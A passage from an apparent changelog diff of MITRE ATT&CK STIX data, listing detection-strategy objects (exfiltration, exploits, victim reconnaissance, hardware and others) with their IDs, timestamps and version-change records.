+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.668000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0873",
+                            "external_id": "DET0873"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Establish Accounts",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--2eb3d192-6e04-4e42-af63-ed3f54f65285"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.668000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d340864e-5685-48d5-8a78-3c55a7169207",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0532",
+                            "external_id": "DET0532"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Event Log Clearing on Windows via Behavioral Chain",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--6482fa33-322b-47e4-a9f7-c2bcc92d132a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--9280a84d-bf77-4a86-a052-ce6ea0d50e72",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0077",
+                            "external_id": "DET0077"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Exfiltration Over Alternate Network Interfaces",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--cf404364-1397-4f0f-9c21-cd534880722a",
+                        "x-mitre-analytic--5b9f2d26-e84c-49a3-8586-a7367580b802",
+                        "x-mitre-analytic--5a05483c-fb3b-4240-bf90-c1873b6bd392"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d187b646-5fb3-4d65-a190-e25e2131f802",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.693000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0512",
+                            "external_id": "DET0512"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Exfiltration Over Asymmetric Encrypted Non-C2 Protocol",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--6869578d-d3e8-4a3c-9717-0a188dc0bafe",
+                        "x-mitre-analytic--a2309590-988e-4116-85e6-59bfc5357726",
+                        "x-mitre-analytic--46585379-5be9-4ce0-9178-c3492f539e11",
+                        "x-mitre-analytic--20ecf7be-864a-4ae0-be66-cf26ffa9a217"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.693000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a772e6e0-017e-4ceb-b125-4620ac85a5bd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.687000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0149",
+                            "external_id": "DET0149"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Exfiltration Over Unencrypted Non-C2 Protocol",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d265376d-3cdc-4e95-a8ea-4c4278860218",
+                        "x-mitre-analytic--ad5fb8d4-7f1c-4442-a4e5-96592364c4cc",
+                        "x-mitre-analytic--b608c89f-ce2c-4993-8522-7b2731851606",
+                        "x-mitre-analytic--82f3feb5-f17e-4c1c-b67d-c8331d220905",
+                        "x-mitre-analytic--611778c2-9de4-4066-b7d1-78752891c32e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.687000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c328d67c-f6e3-491b-9e1c-92f651c15c98",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0827",
+                            "external_id": "DET0827"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Exploits",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--41990c88-06e2-4453-88bf-6bebe776a9a1"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--4b8278b5-5749-4a2d-94b1-5129e43a7455",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0894",
+                            "external_id": "DET0894"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Exploits",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--1762aa55-010b-4a26-b439-7afcfcc5613d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1fba9af9-8087-4958-90c0-ecdd8c887f6f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0416",
+                            "external_id": "DET0416"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of File Transfer Protocol-Based C2 (FTP, FTPS, SMB, TFTP)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--befbbdad-a17b-41f2-bb24-5cb477c5cc50",
+                        "x-mitre-analytic--170e84e2-fa22-4e8c-b2f3-3cafc0d96d7e",
+                        "x-mitre-analytic--9e9efdc0-82d3-4046-a4db-e97454f708a6",
+                        "x-mitre-analytic--61e3802a-c95c-43c2-8749-139e0f750169",
+                        "x-mitre-analytic--9c5ef78d-2e02-4201-ba38-ec858e8b6a6f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--440ba398-6224-4273-b63c-d0efd0fe612a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0818",
+                            "external_id": "DET0818"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Firmware",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8722b13a-1b20-4f2e-991b-153a26bba2a8"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b172a0fa-e429-4e6e-89b4-54dcfcefa893",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0826",
+                            "external_id": "DET0826"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Gather Victim Host Information",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ae4f420e-1d38-4f6e-b4b6-4b0932f596e7"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b5ec4351-ee04-4beb-a019-b1f6d0e00894",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.689000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0841",
+                            "external_id": "DET0841"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Gather Victim Identity Information",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--dc58724a-18a9-4bb9-a901-f5630963095b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.689000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--9031c511-d7ff-410e-9144-d3afee390210",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0869",
+                            "external_id": "DET0869"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Gather Victim Network Information",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ca1afe09-7edb-4415-a240-92a0f30ac22f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--cd39aee1-03f0-489f-a800-ce00c6be617f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.693000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0890",
+                            "external_id": "DET0890"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Gather Victim Org Information",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7726e542-666b-4eeb-8998-cddb45a41605"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.693000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--732ae9e0-1ff8-40bf-bc13-ea3a0bb6fee0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-23 14:53:10.855000+00:00",
+                    "modified": "2026-05-12 16:30:18.390000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0916",
+                            "external_id": "DET0916"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Generate Content",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--360eb601-28db-4418-8474-ad2a432ce534"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2026-04-23 14:53:10.855000+00:00\", \"old_value\": \"2026-04-23T14:53:10.855Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.390000+00:00\", \"old_value\": \"2026-04-24T20:23:47.970Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7aa7d45f-64da-4f16-a905-b4881da82c62",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0305",
+                            "external_id": "DET0305"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Group Policy Modifications via AD Object Changes and File Activity",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ec6e1f3c-e9ff-4944-a426-863eaf9979ea"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d6c882c8-0f01-4027-b988-b979d60e0030",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0887",
+                            "external_id": "DET0887"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Hardware",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--9ead155d-e99b-4cca-8ace-0a90d533e875"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--55ddc6ba-a04a-4e68-bb34-741d38d2c33d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.678000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0815",
+                            "external_id": "DET0815"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of IP Addresses",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e46455a1-a3a3-4de9-916d-41ffd2721062"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.678000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f5ac003f-2fdc-4ac5-9f2b-3fb2ab00fe95",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0849",
+                            "external_id": "DET0849"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Identify Business Tempo",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--65390827-81d9-43d0-9c9d-16d8c6509b90"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
